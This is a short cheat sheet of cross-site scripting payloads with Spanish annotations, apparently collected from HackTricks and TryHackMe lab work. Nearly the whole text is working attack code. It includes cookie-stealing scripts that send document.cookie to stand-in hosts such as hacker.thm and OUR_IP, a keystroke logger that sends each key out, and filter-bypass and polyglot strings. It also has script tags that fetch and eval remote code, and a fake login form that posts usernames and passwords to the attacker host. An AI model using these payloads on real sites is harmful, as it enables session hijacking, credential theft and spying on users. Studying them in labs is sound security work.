Hacktricks:

<img src=x onerror=alert(PAYLOAD)>

steal cookie:
<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>
document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;




keylogger
<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>


quebrar un código JS que recibe el imput
';alert('THM');//

No HTML inject and script clean:
<sSCRIPTcript> </sSCRIPTcript>

Polyglots:

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('el pedro') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e

probar si se conecta a otro servidor:
<script src=http://OUR_IP></script>
'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
<script>$.getScript("http://OUR_IP")</script>

fake form

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
